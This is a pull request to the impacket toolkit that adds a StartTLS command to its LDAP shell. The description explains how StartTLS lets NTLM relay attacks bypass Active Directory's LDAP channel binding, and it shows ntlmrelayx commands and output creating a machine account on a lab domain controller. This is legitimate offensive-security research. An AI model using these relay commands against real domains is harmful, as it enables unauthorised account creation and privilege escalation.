### PR TITLE
Implementing StartTLS

### DIFF
--- a/impacket/examples/ldap_shell.py
+++ b/impacket/examples/ldap_shell.py
@@ -134,7 +134,7 @@ class LdapShell(cmd.Cmd):
     def do_add_computer(self, line):
         args = shlex.split(line)
 
-        if not self.client.server.ssl:
+        if not self.client.server.ssl and not self.client.tls_started:
             print("Error adding a new computer with LDAP requires LDAPS.")
 
         if len(args) != 1 and len(args) != 2 and len(args) !=3:
@@ -243,6 +243,10 @@ class LdapShell(cmd.Cmd):
 
     def do_add_user(self, line):
         args = shlex.split(line)
+
+        if not self.client.server.ssl and not self.client.tls_started:
+            print("Error adding a new user with LDAP requires LDAPS.")
+
         if len(args) == 0:
             raise Exception("A username is required.")
 
@@ -356,6 +360,16 @@ class LdapShell(cmd.Cmd):
         self.stdout.flush()
         self.domain_dumper.domainDump()
         print('Domain info dumped into lootdir!')
+
+    def do_start_tls(self, line):
+        if not self.client.tls_started and not self.client.server.ssl:
+            print('Sending StartTLS command...')
+            if not self.client.start_tls():
+                raise Exception("StartTLS failed")
+            else:
+                print('StartTLS succeded, you are now using LDAPS!')
+        else:
+            print('It seems you are already connected through a TLS channel.')
 
     def do_disable_account(self, username):
         self.toggle_account_enable_disable(username, False)
@@ -637,6 +651,7 @@ class LdapShell(cmd.Cmd):
  grant_control target grantee - Grant full control of a given target object (sAMAccountName) to the grantee (sAMAccountName).
  set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
  set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
+ start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
  write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
  exit - Terminates this session.""")
 


### PR DESCRIPTION
Hello all!

While doing research on LDAP client certificate authentication, I realize that the LDAP implementation of Active Directory supports the StartTLS mechanism, which has interesting implications on relay attacks.

TL;DR: Active Directory LDAP implements StartTLS and it can be used to bypass the Channel Binding requirement of LDAPS for some relay attacks such as the creation of a machine account if LDAP signing is not required by the domain controller.

More info in the [accompanying blog post](https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html).

## Example

Relaying to LDAPS with Channel Binding:
```
$ ntlmrelayx.py -t ldaps://172.20.15.209 --no-da --no-acl --no-validate-privs --add-computer 'OFFSECATTACK$' -smb2support --http-port 3128

[…]

[*] HTTPD: Received connection from 172.16.0.40, attacking target ldaps://172.20.15.209
[*] Authenticating against ldaps://172.20.15.209 as OFFSEC\LAP1337$ FAILED
```

With this PR, ntlmrelayx uses StartTLS and the attack works:
```
$ ntlmrelayx.py -t ldap://172.20.15.209 --no-da --no-acl --no-validate-privs --add-computer 'OFFSECATTACK$' -smb2support --http-port 8080

[…]

[*] HTTPD: Received connection from 172.16.0.40, attacking target ldap://172.20.15.209
[*] Authenticating against ldap://172.20.15.209 as OFFSEC\LAP1337$ SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[-] Adding a machine account to the domain requires TLS but ldap:// scheme provided. Switching target to LDAPS via StartTLS
[*] Attempting to create computer in: CN=Computers,DC=offsec,DC=local
[*] Adding new computer with username: OFFSECATTACK$ and password: +v[;6Kiid>ir)Bd result: OK
```

Keep in mind that this bypass **only works on domain controller with LDAP signing not required**.

:sunflower: 